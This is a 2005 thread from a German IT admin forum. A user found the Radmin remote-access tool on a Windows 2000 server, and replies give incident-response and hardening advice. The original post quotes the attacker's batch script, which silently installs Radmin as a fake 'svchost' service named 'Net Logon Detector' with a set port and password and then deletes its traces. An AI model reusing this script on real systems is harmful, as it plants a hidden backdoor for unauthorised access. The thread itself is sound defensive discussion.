Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWünsch Dir wasWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Angriff auf W2k Server - RAdmin

Mitglied: 3080

3080 (Level 1)

17.01.2005, aktualisiert 09.01.2009, 6054 Aufrufe, 5 Kommentare

Als ich unseren Win2000 Server wegen der neusten Windows-Updates rebootet habe war auf einmal folgendes Symbol/Programm aktiv bzw. in der Taskleiste zu sehen:

<img src='/images/articles/1632a072e2b31656b01d16faa7dbf233-radmin.jpg' align='default' hspace='0' vspace='0' border='0'>

Nach hin- und hersuchen und Informationen einholen hab ich dann schliesslich einige Dateien in Winnt\Installer\{irgendeinHashwert} gefunden, unter anderem auch folgende Batch-Datei:

@echo off
rmico
svchost /install /silence
svchost /save /port:18 /pass:An30Gm34 /silence
net start R_server
svcinst -c R_server "Net Logon Detector"
del rmico.reg /a/f/q
del rmico.exe /a/f/q
del temp2.bat /a /f /q

Hier hat wohl jemand ein Fernadministrations-Tool installiert, aber könnt Ihr mir sagen was hier genau abläuft? Habe die dazugehörigen Dateien gelöscht, Einträge in der Registry unter dem Namen "RAdmin" entfernt, den Remote-Registry-Dienst gestoppt und den Server neu gestartet. Jetzt ist das Symbol zwar weg, aber mich würde trotzdem mal interessieren wie es dahinkommt und welchen Risiken der Server ausgesetzt ist damit sowas überhaupt möglich ist. Gibt es eine zuverlässige Firewall für W2k Server um sich vor soetwas zu schützen?
Mitglied: 7217
17.01.2005 um 14:51 Uhr
Herzlichen Glückwunsch:

du hast mit deiner voreiligen Aktion sämtliche Beweise vernichtet! Was du cleverer hättest machen sollen wäre eine komplette Sicherung des Systems gewesen (vorher alle Netzwerkaktivitäten sichern, damit man weiss, in welchem Status das Gerät aktuell war und ob evtl. noch Verbindungen zum Feind bestanden haben).

Anschließend hätte ich den Server vom Netz genommen und "Forensik" betrieben, was genau bedeutet, dass man mal versucht herauszufinden, welche Löcher man sich denn in die Sicherheit seines Servers geschossen hat.

Firewalls (auf dem Server) dürften dich vor sowas nur sehr marginal schützen. Sicherer ist es, den Patchstatus des Servers aktuell zu halten und auf jeden unnötigen Schnickschnack zu verzichten.

Gruß, Mupfel
Bitte warten ..
Mitglied: fresch-heit
18.01.2005 um 19:27 Uhr
/ironie/
hast du echt ne direkte verbindungs ins inet... ohne firewall /virenscanner sowas gibts noch ;)) und ich wunder mich warum sich viren immer noch so verbreiten... tsss
/ironie/
Bitte warten ..
Mitglied: 7217
18.01.2005 um 19:36 Uhr
Ich sprach von einer Firewall AUF dem Server... was ich VOR meinen Servern habe, ist ne ganz andere Geschichte.

Gruß, Mupfel
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:20 Uhr
ich hab remoteadministrator zuhause aufm pc drauf. ist ein einfaches remote tool. soll einige lücken haben und knackbar sein.

ich hätte den Server vom Netz genommen (und wenn das nicht geht, zumindest den im server eingestellten "incoming port" gesperrt (standard 4899 oder so)). Danach hätte ich mir mal die logfiles angeschaut... oder wenn du eindeutig beim angriff benutzte dateien hast, alles im system mit dem gleichen erstelldatum (zeitraum) gesucht.

Wenn das Ding schon gelaufen ist ( >3 std), hast du praktisch keine chance mehr. Er hat damit vollzugriff und mit 1-3 scripten hat er vmware oder weiss sonst was dazuinstalliert.

Viel Spass beim neuinstallieren oO
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:22 Uhr
nachtrag:

wenn du davor eine gute FW hast brauchst du auf dem server kaum noch eine. Du solltest lieber den patchstatus aktuell halten (wie schon gesagt wurde) und dir deine 3rd Party Programme, welche netzwerkdienste anbieten, mal genauer anschaun...
Bitte warten ..
Ähnliche Inhalte
CPU, RAM, Mainboards

IAMT KVM-Zugriff (RADMIN-Viewer, VNC-Viewer, . )

gelöst Frage von moar70CPU, RAM, Mainboards7 Kommentare

Hallo! Ich habe auf meiner TAROX-Workstation (Mainboard Fujitsu D3128 B2) iAMT (Version ME 8.1.40.1416) konfiguriert. Der Webzugriff mittels funktioniert, ...

Firewall

WIndows 7 RDP Massen Angriff

Frage von Motte990Firewall26 Kommentare

Guten Abend Leute , zurzeit wird mein PC massiv von 9 unterschiedlichen IP's Angegriffen . Kaspersky Internet Security 2018 ...

Sicherheitsgrundlagen

Rest-Sicherheitsrisiko durch Blockierten Angriff beim Surfen? - Phishing oder Virus - Angriff

Frage von LoopingLuiSicherheitsgrundlagen5 Kommentare

Hallo Leute, beim Surfen wurde ich nach einer Google Suche, wo ich die Website des Herstellers LiteOnIt aufrufen wollte, ...

Erkennung und -Abwehr

"Angriff auf unseren Shopserver" vom Mikrotik Shop

Information von LochkartenstanzerErkennung und -Abwehr11 Kommentare

Moin, kam gerade eine Email fmsweb, daß der mikrotik-shop gehackt worden wäre. und sie erpreßt würden: wir möchten Sie ...

Neue Wissensbeiträge
Datenschutz

Berliner Datenschutzbeauftragten prüfen Videokonferenz-SW

Information von Visucius vor 2 TagenDatenschutz

Eine grüne Ampel erhielten kommerziell bereitgestellte Instanzen der Open-Source-Software Jitsi, etwa von Netways oder sichere-videokonferenz.de. Eine positive Bewertung erhielten ...

LAN, WAN, Wireless
Sophos Central Wireless v2.3.0-6 massive Probleme
Information von Voiper vor 4 TagenLAN, WAN, Wireless

Hallo Zusammen, wenn Ihr Sophos Central nutzt und die neuen APX Accesspoints im Einsatz habt, vermeidet das Update der ...

Off Topic
Wuebra - tech-flare
Information von tech-flare vor 5 TagenOff Topic3 Kommentare

Servus, Nein ihr seid mich nicht los Aus Wuebra wird tech-flare. Schöne Restwoche :)

Ausbildung
Crashkurs in Computertools - das fehlende Semester
Information von NetzwerkDude vor 6 TagenAusbildung

Moin, habe eigentlich was anderes gesucht, aber zufällig diesen MIT Kurs gefunden: Sind 11 Lektionen je 1 Stunde, als ...

Heiß diskutierte Inhalte
Netzwerkgrundlagen
Verschiedene Subnetzmaske in der Praxis: Völlig unnötig für kleine Netzwerke!?
Frage von media0815Netzwerkgrundlagen17 Kommentare

Hallo, mal eine ketzerische Frage: Ist die Verwendung unterschiedlicher Subnetzmasken in kleineren Netzwerke nicht völlig unnötig!? Oder anders gefragt: ...

LAN, WAN, Wireless
CAT 5 (nicht CAT 5e) vs. 1 GBit - kann man das "heilen" (bspw. durch Adern zu manipulieren o.ä.)?
Frage von xdevelxLAN, WAN, Wireless12 Kommentare

Hallo zusammen, ich habe nun endlich eine Internet-Leitung erhalten, die die 100 MBit-Grenze übersteigt - leider kann ich zu ...

Ubuntu
Wie kann man zwei Spalten austauschen und dabei das Trennzeichen " " durch ":" ersetzen?
gelöst Frage von 144803Ubuntu9 Kommentare

Guten Tag an alle, ich habe eine Datei: Was ich brauche ist folgendes: Wie kann man das realisieren? Das ...

Router & Routing
Routingproblem 2 Router
gelöst Frage von e1ns2woRouter & Routing8 Kommentare

Hallo zusammen, ich habe hinter meiner Fritzbox (Routerzwang Provider) noch einen Asus RT-AC68U Router hängen. Der Asus Router ist ...